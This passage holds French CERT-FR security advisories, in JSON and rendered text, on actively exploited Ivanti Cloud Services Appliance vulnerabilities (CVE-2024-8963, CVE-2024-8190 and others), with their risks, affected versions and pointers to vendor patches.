  "last_revision_date": "2024-10-09T00:00:00",
  "links": [],
  "reference": "CERTFR-2024-AVI-0851",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2024-10-09T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Ivanti. Elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.\n\nIvanti indique que les vuln\u00e9rabilit\u00e9s CVE-2024-9379 et CVE-2024-9380 sont activement exploit\u00e9es dans le cadre d\u0027attaques cibl\u00e9es, en combinaison avec la vuln\u00e9rabilit\u00e9 CVE-2024-8963.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Ivanti",
  "vendor_advisories": [
    {
      "published_at": "2024-10-07",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti CVE-2024-7612",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2024-7612"
    },
    {
      "published_at": "2024-10-08",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti october-2024-security-update",
      "url": "https://www.ivanti.com/blog/october-2024-security-update"
    },
    {
      "published_at": "2024-10-08",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti CVE-2024-37404",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-and-Policy-Secure-CVE-2024-37404"
    },
    {
      "published_at": "2024-10-08",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti CVE-2024-9379-CVE-2024-9380-CVE-2024-9381",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381"
    }
  ]
}

CERTFR-2024-AVI-0796
Vulnerability from certfr_avis

Une vulnérabilité a été découverte dans Ivanti Cloud Service Appliance (CSA). Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

Ivanti déclare que la vulnérabilité CVE-2024-8963 est activement exploitée dans le cadre d'attaques ciblées, en combinaison avec la vulnérabilité CVE-2024-8190.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Ivanti a publié un correctif de sécurité pour la version 4.6 (Patch 519), mais précise que la branche 4.x est en fin de vie et encourage ses clients à migrer en version 5.0.

Impacted products
Vendor Product Description
Ivanti Cloud Service Appliance (CSA) Cloud Services Appliance versions antérieures à 5.0
References

Show details on source website


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cloud Services Appliance versions ant\u00e9rieures \u00e0 5.0",
      "product": {
        "name": "Cloud Service Appliance (CSA)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "Ivanti a publi\u00e9 un correctif de s\u00e9curit\u00e9 pour la version 4.6 (Patch 519), mais pr\u00e9cise que la branche 4.x est en fin de vie et encourage ses clients \u00e0 migrer en version 5.0.",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2024-8963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8963"
    }
  ],
  "initial_release_date": "2024-09-20T00:00:00",
  "last_revision_date": "2024-09-20T00:00:00",
  "links": [
    {
      "title": "Avis de s\u00e9curit\u00e9 CERT-FR CERTFR-2024-AVI-0784 du 17 septembre 2024",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0784/"
    }
  ],
  "reference": "CERTFR-2024-AVI-0796",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2024-09-20T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Ivanti Cloud Service Appliance (CSA). Elle permet \u00e0 un attaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.\n\nIvanti d\u00e9clare que la vuln\u00e9rabilit\u00e9 CVE-2024-8963 est activement exploit\u00e9e dans le cadre d\u0027attaques cibl\u00e9es, en combinaison avec la vuln\u00e9rabilit\u00e9 CVE-2024-8190.",
  "title": "Vuln\u00e9rabilit\u00e9 dans Ivanti Cloud Services Appliance",
  "vendor_advisories": [
    {
      "published_at": "2024-09-19",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963"
    }
  ]
}

CERTFR-2024-AVI-0784
Vulnerability from certfr_avis

Une vulnérabilité a été découverte dans Ivanti Cloud Service Appliance (CSA). Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

Ivanti déclare que la vulnérabilité CVE-2024-8190 est activement exploitée dans le cadre d'attaques ciblées, en combinaison avec la vulnérabilité CVE-2024-8963.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Ivanti a publié un correctif de sécurité pour la version 4.6 (Patch 519), mais précise que la branche 4.x est en fin de vie et encourage ses clients à migrer en version 5.0.

Impacted products
Vendor Product Description
Ivanti Cloud Service Appliance (CSA) Cloud Services Appliance versions antérieures à 5.0
References

Show details on source website


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cloud Services Appliance versions ant\u00e9rieures \u00e0 5.0",
      "product": {
        "name": "Cloud Service Appliance (CSA)",
        "vendor": {
          "name": "Ivanti",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "Ivanti a publi\u00e9 un correctif de s\u00e9curit\u00e9 pour la version 4.6 (Patch 519), mais pr\u00e9cise que la branche 4.x est en fin de vie et encourage ses clients \u00e0 migrer en version 5.0.",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2024-8190",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8190"
    }
  ],
  "initial_release_date": "2024-09-17T00:00:00",
  "last_revision_date": "2024-09-20T00:00:00",
  "links": [
    {
      "title": "Avis de s\u00e9curit\u00e9 CERT-FR CERTFR-2024-AVI-0796 du 20 septembre 2024",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0796/"
    }
  ],
  "reference": "CERTFR-2024-AVI-0784",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2024-09-17T00:00:00.000000"
    },
    {
      "description": "Ivanti indique que la vuln\u00e9rabilit\u00e9 CVE-2024-8190 est exploit\u00e9e en combinaison avec la vuln\u00e9rabilit\u00e9 CVE-2024-8963.",
      "revision_date": "2024-09-20T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Ivanti Cloud Service Appliance (CSA). Elle permet \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n\nIvanti d\u00e9clare que la vuln\u00e9rabilit\u00e9 CVE-2024-8190 est activement exploit\u00e9e dans le cadre d\u0027attaques cibl\u00e9es, en combinaison avec la vuln\u00e9rabilit\u00e9 CVE-2024-8963.",
  "title": "Vuln\u00e9rabilit\u00e9 dans Ivanti Cloud Service Appliance",
  "vendor_advisories": [
    {
      "published_at": "2024-09-10",
      "title": "Bulletin de s\u00e9curit\u00e9 Ivanti",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US"
    }
  ]
}